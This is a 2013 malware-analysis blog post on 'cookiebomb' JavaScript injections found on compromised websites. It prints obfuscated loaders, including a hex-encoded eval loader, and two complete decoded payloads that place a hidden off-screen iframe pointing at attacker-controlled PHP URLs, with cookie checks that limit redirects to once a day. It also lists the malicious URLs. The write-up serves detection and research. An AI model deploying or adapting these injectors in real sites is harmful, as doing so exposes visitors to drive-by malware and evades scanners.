Monday, September 23, 2013

8 samples of cookie based web malware

Background

Online Website Malware Scanner has detected malicious JavaScript code injection in several website page(s). The decoded payload uses web cookies as a parameter for triggering the malicious redirect of visitor's browser. Cookies are checked on browser and if were not found they are being created. Later they are used to bypass traditional detection methods by applying the malicious action at certain period of time. This technique was described in malwaremustdie blog where author gave, in my opinion, a great name for it - "cookiebomb attack". You can review previous analysis of similar attacks in our other posts describing malware that involves web cookies.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Malicious payload

Decoded payload generates hidden iframe tohttp://brscertification.ir/promo2/Lnr927Qv.php if cookie does not exists on the visitor browser and generates the cookie. The expiration time set in function ensures that the same visitor won't be redirected more than once a day.

}

w = f;

s =[];

for(i =20-20;- i +1354!=0; i +=1){

j = i;

if((0x19 == 031))

if(e) s +=String["fromCharCode"](e(aq + w[j])+ 0xa - bv);

}

za = e;

za(s)

}

Malicious payload

Decoded payload generates hidden iframe tohttp://viscol.com.tr/wp-content/plugins/customize-admin/ZwcD2SsE.php if cookie does not exists on the visitor browser and generates the cookie. The expiration time set in function ensures that the same visitor won't be redirected more than once a day.

}

rzeyu = vgdck;

gfb =[];

for(dbml =22-20-2;- dbml +1411!=0; dbml +=1){

tpeh = dbml;

}

aqfmw = eval;

aqfmw(gfb)

}

Malicious payload

Decoded payload generates hidden iframe tohttp://becattinipiante.it/Grafica/clik.php if cookie does not exists on the visitor browser and generates the cookie. The expiration time set in function ensures that the same visitor won't be redirected more than once a day.

function xob09(){

varstatic='ajax';

var controller ='index.php';

var xob = document.createElement('iframe');

xob.src='http://becattinipiante.it/Grafica/clik.php';

xob.style.position='absolute';

xob.style.color='42139';

xob.style.height='42139px';

xob.style.width='42139px';

xob.style.left='100042139';

xob.style.top='100042139';

if(!document.getElementById('xob')){

document.write('<p id=\'xob\' class=\'xob09\' ></p>');

document.getElementById('xob').appendChild(xob);

}

}

function SetCookie(cookieName, cookieValue, nDays, path){

var today =newDate();

var expire =newDate();

if(nDays ==null|| nDays ==0) nDays =1;

expire.setTime(today.getTime()+3600000*24* nDays);

document.cookie= cookieName +"="+ escape(cookieValue)

+";expires="+ expire.toGMTString()+((path)?"; path="+ path :"");

}

function GetCookie(name){

var start = document.cookie.indexOf(name +"=");

var len = start + name.length+1;

if((!start)&&

(name != document.cookie.substring(0, name.length)))

{

returnnull;

}

if(start ==-1)returnnull;

var end = document.cookie.indexOf(";", len);

if(end ==-1) end = document.cookie.length;

return unescape(document.cookie.substring(len, end));

}

if(navigator.cookieEnabled)

{

if(GetCookie('visited_uq')==55){}else{

SetCookie('visited_uq','55','1','/');

xob09();

}

}

Sample 4

Beautified script

/*32f02e*/

if(document.querySelector) zq =4;

a =("27,6d,7c,75,6a,7b,70,76,75,27,77,7c,80,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,77,7c,80,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,77,7c,80,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,7e,7e,7e,35,74,76,69,70,73,6c,73,70,6d,7b,76,6d,6d,35,6a,76,74,36,70,74,68,6e,6c,7a,36,69,54,5f,5e,59,5b,53,6e,35,77,6f,77,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,77,76,7a,70,7b,70,76,75,27,44,27,2e,68,69,7a,76,73,7c,7b,6c,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,6a,76,73,76,79,27,44,27,2e,40,3f,39,3e,40,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,6f,6c,70,6e,6f,7b,27,44,27,2e,40,3f,39,3e,40,77,7f,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,7e,70,6b,7b,6f,27,44,27,2e,40,3f,39,3e,40,77,7f,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,73,6c,6d,7b,27,44,27,2e,38,37,37,37,40,3f,39,3e,40,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,7b,76,77,27,44,27,2e,38,37,37,37,40,3f,39,3e,40,2e,42,14,11,14,11,27,70,6d,27,2f,28,6b,76,6a,7c,74,6c,75,7b,35,6e,6c,7b,4c,73,6c,74,6c,75,7b,49,80,50,6b,2f,2e,77,7c,80,2e,30,30,27,82,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,7e,79,70,7b,6c,2f,2e,43,77,27,70,6b,44,63,2e,77,7c,80,63,2e,27,6a,73,68,7a,7a,44,63,2e,77,7c,80,37,40,63,2e,27,45,43,36,77,45,2e,30,42,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,6e,6c,7b,4c,73,6c,74,6c,75,7b,49,80,50,6b,2f,2e,77,7c,80,2e,30,35,68,77,77,6c,75,6b,4a,6f,70,73,6b,2f,77,7c,80,30,42,14,11,27,84,14,11,84,14,11,6d,7c,75,6a,7b,70,76,75,27,5a,6c,7b,4a,76,76,72,70,6c,2f,6a,76,76,72,70,6c,55,68,74,6c,33,6a,76,76,72,70,6c,5d,68,73,7c,6c,33,75,4b,68,80,7a,33,77,68,7b,6f,30,27,82,14,11,27,7d,68,79,27,7b,76,6b,68,80,27,44,27,75,6c,7e,27,4b,68,7b,6c,2f,30,42,14,11,27,7d,68,79,27,6c,7f,77,70,79,6c,27,44,27,75,6c,7e,27,4b,68,7b,6c,2f,30,42,14,11,27,70,6d,27,2f,75,4b,68,80,7a,44,44,75,7c,73,73,27,83,83,27,75,4b,68,80,7a,44,44,37,30,27,75,4b,68,80,7a,44,38,42,14,11,27,6c,7f,77,70,79,6c,35,7a,6c,7b,5b,70,74,6c,2f,7b,76,6b,68,80,35,6e,6c,7b,5b,70,74,6c,2f,30,27,32,27,3a,3d,37,37,37,37,37,31,39,3b,31,75,4b,68,80,7a,30,42,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,27,44,27,6a,76,76,72,70,6c,55,68,74,6c,32,29,44,29,32,6c,7a,6a,68,77,6c,2f,6a,76,76,72,70,6c,5d,68,73,7c,6c,30,14,11,27,32,27,29,42,6c,7f,77,70,79,6c,7a,44,29,27,32,27,6c,7f,77,70,79,6c,35,7b,76,4e,54,5b,5a,7b,79,70,75,6e,2f,30,27,32,27,2f,2f,77,68,7b,6f,30,27,46,27,29,42,27,77,68,7b,6f,44,29,27,32,27,77,68,7b,6f,27,41,27,29,29,30,42,14,11,84,14,11,6d,7c,75,6a,7b,70,76,75,27,4e,6c,7b,4a,76,76,72,70,6c,2f,27,75,68,74,6c,27,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,79,7b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,70,75,6b,6c,7f,56,6d,2f,27,75,68,74,6c,27,32,27,29,44,29,27,30,42,14,11,27,7d,68,79,27,73,6c,75,27,44,27,7a,7b,68,79,7b,27,32,27,75,68,74,6c,35,73,6c,75,6e,7b,6f,27,32,27,38,42,14,11,27,70,6d,27,2f,27,2f,27,28,7a,7b,68,79,7b,27,30,27,2d,2d,14,11,27,2f,27,75,68,74,6c,27,28,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,7a,7c,69,7a,7b,79,70,75,6e,2f,27,37,33,27,75,68,74,6c,35,73,6c,75,6e,7b,6f,27,30,27,30,27,30,14,11,27,82,14,11,27,79,6c,7b,7c,79,75,27,75,7c,73,73,42,14,11,27,84,14,11,27,70,6d,27,2f,27,7a,7b,68,79,7b,27,44,44,27,34,38,27,30,27,79,6c,7b,7c,79,75,27,75,7c,73,73,42,14,11,27,7d,68,79,27,6c,75,6b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,70,75,6b,6c,7f,56,6d,2f,27,29,42,29,33,27,73,6c,75,27,30,42,14,11,27,70,6d,27,2f,27,6c,75,6b,27,44,44,27,34,38,27,30,27,6c,75,6b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,73,6c,75,6e,7b,6f,42,14,11,27,79,6c,7b,7c,79,75,27,7c,75,6c,7a,6a,68,77,6c,2f,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,7a,7c,69,7a,7b,79,70,75,6e,2f,27,73,6c,75,33,27,6c,75,6b,27,30,27,30,42,14,11,84,14,11,70,6d,27,2f,75,68,7d,70,6e,68,7b,76,79,35,6a,76,76,72,70,6c,4c,75,68,69,73,6c,6b,30,14,11,82,14,11,70,6d,2f,4e,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,77,7c,80,37,40,2f,30,42,14,11,84,14,11,84".split(","));

r = eval;

functionvqvq(){

zva =function(){

--(d.body)

}()

}

d = document;

for(i =0; i < a.length; i +=1){

a[i]=-(12-5)+ parseInt(a[i], zq *4);

}

try{

vqvq()

}catch(q){

yy =50-50;

}

try{

yy /=123

}catch(pq){

yy =1;

}

if(!yy) r(String["fr"+"omCh"+"arCo"+"de"].apply(String, a));

Malicious payload

Decoded payload generates hidden iframe tohttp://www.mobileliftoff.com/images/bMXWRTLg.phpif cookie does not exists on the visitor browser and generates the cookie. The expiration time set in function ensures that the same visitor won't be redirected more than once a day.

}

mlrc = wrlsgy;

axrc =[];

for(rmjtk =22-20-2;- rmjtk +1418!=0; rmjtk +=1){

urhuyl = rmjtk;

}

eval(axrc);

}

Malicious payload

Decoded payload generates hidden iframe tohttp://www.kcrtrucking.com/NJHTk3VC.php if cookie does not exists on the visitor browser and generates the cookie. The expiration time set in function ensures that the same visitor won't be redirected more than once a day.

}

zlxzg = tldot;

ljy =[];

for(jnjw =22-20-2;- jnjw +1370!=0; jnjw +=1){

yfap = jnjw;

}

dbbvw = eval;

dbbvw(ljy)

}

Malicious payload

Decoded payload generates hidden iframe tohttp://oxloxul.net/ibm.php if cookie does not exists on the visitor browser and generates the cookie. The expiration time set in function ensures that the same visitor won't be redirected more than once a day.

}

koibb = cegp;

sul =[];

for(dadzvp =22-20-2;- dadzvp +1432!=0; dadzvp +=1){

mfemzi = dadzvp;

}

wmoxjo = eval;

wmoxjo(sul)

}

Malicious payload

Decoded payload generates hidden iframe tohttp://alsearsmd.net/apps/nkdLqtPz.php if cookie does not exists on the visitor browser and generates the cookie. The expiration time set in function ensures that the same visitor won't be redirected more than once a day.

for(mrhq =0; mrhq < apggms["length"]; mrhq +=1){

apggms[mrhq]=-(98)+ parseInt(apggms[mrhq], dllai *4);

}

try{

acqyu()

}catch(nnj){

dueip =50-50;

}

Malicious payload

Decoded payload generates hidden iframe tohttp://umweltfestival.de/wp-content/827btkpf.php if cookie does not exists on the visitor browser and generates the cookie. The expiration time set in function ensures that the same visitor won't be redirected more than once a day.

function x09(){

varstatic='ajax';

var controller ='index.php';

var x = document.createElement('iframe');

x.src='http://umweltfestival.de/wp-content/827btkpf.php';

x.style.position='absolute';

x.style.color='50572';

x.style.height='50572px';

x.style.width='50572px';

x.style.left='100050572';

x.style.top='100050572';

if(!document.getElementById('x')){

document.write('<p id=\'x\' class=\'x09\' ></p>');

document.getElementById('x').appendChild(x);

}

}

function SetCookie(cookieName, cookieValue, nDays, path){

var today =newDate();

var expire =newDate();

if(nDays ==null|| nDays ==0) nDays =1;

expire.setTime(today.getTime()+3600000*24* nDays);

document.cookie= cookieName +"="+ escape(cookieValue)

+";expires="+ expire.toGMTString()+((path)?"; path="+ path :"");

}

function GetCookie(name){

var start = document.cookie.indexOf(name +"=");

var len = start + name.length+1;

if((!start)&&

(name != document.cookie.substring(0, name.length)))

{

returnnull;

}

if(start ==-1)returnnull;

var end = document.cookie.indexOf(";", len);

if(end ==-1) end = document.cookie.length;

return unescape(document.cookie.substring(len, end));

}

if(navigator.cookieEnabled)

{

if(GetCookie('visited_uq')==55){}else{

SetCookie('visited_uq','55','1','/');

x09();

}

}

Summary

It can be seen that ALL payloads are actually the same. The only difference is the function name. It can be assumed that the attack was automated and massively infected vulnerable servers/ websites.

What about the iframes targets?

Let's first list them:

http://brscertification.ir/promo2/Lnr927Qv.php

http://viscol.com.tr/wp-content/plugins/customize-admin/ZwcD2SsE.php

http://becattinipiante.it/Grafica/clik.php

http://www.mobileliftoff.com/images/bMXWRTLg.php

http://www.kcrtrucking.com/NJHTk3VC.php

http://oxloxul.net/ibm.php

http://alsearsmd.net/apps/nkdLqtPz.php

http://umweltfestival.de/wp-content/827btkpf.php

All iframes try to load what appears to be .php scripts. The names has no sense and webmaster would unlikely create such names for valid files. Hence we can assume the random name generation by malware tools.

What about their location on the server? We can see two wp-content folders, - hacked Word Press installation. Others are promo2, Grafika, images, apps and top directory.

Let's see whether other blacklisting authorities have those domain in the databases?